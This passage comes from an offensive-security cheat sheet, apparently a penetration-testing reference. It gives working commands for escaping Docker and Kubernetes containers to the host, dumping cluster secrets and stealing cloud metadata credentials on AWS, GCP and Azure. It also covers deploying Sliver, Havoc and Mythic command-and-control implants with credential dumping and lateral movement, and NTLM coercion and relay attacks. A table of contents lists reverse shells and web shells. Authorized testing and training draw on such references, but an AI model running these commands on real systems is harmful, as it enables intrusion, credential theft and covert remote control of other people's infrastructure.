# Docker socket via TCP
docker -H tcp://172.17.0.1:2375 run -v /:/hostfs -it alpine chroot /hostfs bash

Kubernetes

bash

# Detect pod
ls /var/run/secrets/kubernetes.io/serviceaccount/
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc
 
# Enumerate permissions
kubectl auth can-i --list
curl -sk $APISERVER/api/v1/namespaces --header "Authorization: Bearer $TOKEN"
 
# List pods & secrets
kubectl get pods --all-namespaces
kubectl get secrets --all-namespaces -o yaml
 
# Create privileged pod (if allowed)
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: evil-pod
spec:
  containers:
  - name: pwn
    image: alpine
    command: ["/bin/sh", "-c", "sleep 999999"]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
      type: Directory
  hostNetwork: true
  hostPID: true
EOF
kubectl exec -it evil-pod -- chroot /host bash
 
# Kubelet API (port 10250)
curl -sk https://$NODE_IP:10250/pods
curl -sk https://$NODE_IP:10250/run/<namespace>/<pod>/<container> -d "cmd=id"

Cloud Metadata Endpoints

bash

# AWS IMDSv1
curl -s http://169.254.169.254/latest/meta-data/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/<ROLE>
curl -s http://169.254.169.254/latest/user-data
 
# AWS IMDSv2 (token required)
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/
 
# GCP
curl -s -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
curl -s -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/project/attributes/
 
# Azure
curl -s -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
curl -s -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
 
# DigitalOcean
curl -s http://169.254.169.254/metadata/v1/

11. Modern C2 Frameworks

Sliver

bash

# Install
curl https://sliver.sh/install | sudo bash
sliver-server
 
# Generate implants
generate --mtls LHOST:8888 --os windows --arch amd64 --format exe --save /tmp/implant.exe
generate --mtls LHOST:8888 --os linux --arch amd64 --format elf --save /tmp/implant
generate --http LHOST:443 --os windows --skip-symbols --save /tmp/implant.exe
 
# Start listeners
mtls --lhost 0.0.0.0 --lport 8888
https --lhost 0.0.0.0 --lport 443 --domain legitimate.com
 
# Session interaction
sessions                         # List sessions
use <session-id>                 # Interact
info                             # System info
ps                               # Processes
upload /tmp/linpeas.sh /tmp/     # Upload file
download /etc/shadow             # Download file
 
# Privilege escalation & lateral movement
getsystem                        # Attempt SYSTEM
impersonate                      # Token impersonation
psexec -t <target> -u user -p pass -d domain
 
# SOCKS proxy
socks5 start --port 1080
 
# Execute .NET assemblies (Rubeus, SharpHound, etc.)
armory install rubeus
execute-assembly /path/to/Rubeus.exe kerberoast

Havoc

bash

# Build
git clone https://github.com/HavocFramework/Havoc.git && cd Havoc && make
sudo ./havoc server --profile profiles/havoc.yaotl -v
./havoc client
 
# Demon agent commands (via GUI)
shell whoami                     # Shell command
upload / download                # File transfer
token steal <PID>                # Token impersonation
token make <user> <pass>         # Create token
mimikatz logonpasswords          # Credential dump
psexec <target> <command>        # Lateral movement
inline-execute /path/to/bof.o    # BOF execution

Mythic

bash

# Install
git clone https://github.com/its-a-feature/Mythic.git && cd Mythic
sudo ./mythic-cli install && sudo ./mythic-cli start
 
# Install agents
sudo ./mythic-cli install github https://github.com/MythicAgents/apollo      # Windows
sudo ./mythic-cli install github https://github.com/MythicAgents/poseidon    # Linux/Mac
 
# Install C2 profiles
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http
 
# Web UI: https://localhost:7443
# Agents managed via browser

12. Coercion Techniques

Automated Coercion

bash

# Coercer — 12+ methods in one tool
pip install coercer
coercer scan -t $TARGET -u user -p pass -d domain.com           # Scan for vulnerable methods
coercer coerce -t $TARGET -l $LISTENER -u user -p pass -d domain.com  # Trigger coercion
 
# NetExec all-in-one
nxc smb $TARGET -u user -p pass -M coerce_plus

Individual Techniques

bash

# PetitPotam (MS-EFSR) — unauthenticated possible
python3 PetitPotam.py $LISTENER $TARGET                         # Unauthenticated
python3 PetitPotam.py -u user -p pass -d domain.com $LISTENER $TARGET
 
# PrinterBug / SpoolSample (MS-RPRN)
python3 printerbug.py domain/user:pass@$TARGET $LISTENER
 
# DFSCoerce (MS-DFSNM) — authenticated only
python3 dfscoerce.py -u user -p pass -d domain.com $LISTENER $TARGET
 
# ShadowCoerce (MS-FSRVP)
python3 shadowcoerce.py -u user -p pass -d domain.com $LISTENER $TARGET

Relay Setup (run BEFORE coercion)

bash

# Relay to LDAP (for RBCD)
ntlmrelayx.py -t ldap://$DC --delegate-access --escalate-user 'EVIL$'
 
# Relay to AD CS HTTP enrollment (ESC8)
ntlmrelayx.py -t http://$CA/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
 
# Relay to LDAP for shadow credentials
ntlmrelayx.py -t ldap://$DC --shadow-credentials --shadow-target '$TARGET$'

Coercion Reference

Technique	Interface	Auth Required	Service Needed
PetitPotam	MS-EFSR	No (patched) / Yes	EFS
PrinterBug	MS-RPRN	Yes	Print Spooler
DFSCoerce	MS-DFSNM	Yes	DFS Namespaces
ShadowCoerce	MS-FSRVP	Yes	File Server VSS Agent
WSPCoerce	MS-WSP	Yes	Windows Search

Table of Contents

1. Reconnaissance

Nmap Scanning

Quick Scans

Specialized Scans

Scan Types

Web Reconnaissance

Technology Fingerprinting

Directory & File Brute-forcing

Subdomain & VHost Enumeration

Information Leaks

DNS Enumeration

SNMP Enumeration

Reconnaissance Checklist

2. Service Enumeration

SMB (445/139)

FTP (21)

SSH (22)

HTTP/HTTPS (80/443/8080)

DNS (53)

LDAP (389/636)

Kerberos (88)

MSSQL (1433)

MySQL (3306)

Redis (6379)

NFS (2049)

SNMP (161/UDP)

RPC (135/111)

WinRM (5985/5986)

Tomcat (8080/8443)

WordPress

3. Web Application Attacks

SQL Injection

Detection

Union-Based SQLi

Blind SQLi

SQLMap

Cross-Site Scripting (XSS)

Payloads

Server-Side Template Injection (SSTI)

Detection

Exploitation

Command Injection

Operators

Blind Command Injection

File Inclusion

Local File Inclusion (LFI)

Remote File Inclusion (RFI)

File Upload

Bypass Techniques

Deserialization

PHP

Python (Pickle)

Java

XXE (XML External Entity)

SSRF (Server-Side Request Forgery)

JWT Attacks

OAuth/OIDC Attacks

HTTP Request Smuggling

Prototype Pollution

4. Shells & File Transfers

Reverse Shells

Bash

Python

PHP

Perl

Ruby

Netcat

PowerShell

Listeners

Shell Upgrade

Bind Shells

Web Shells

PHP

ASP/ASPX

JSP

Payloads with msfvenom

File Transfer Methods

Linux to Linux

Linux to Windows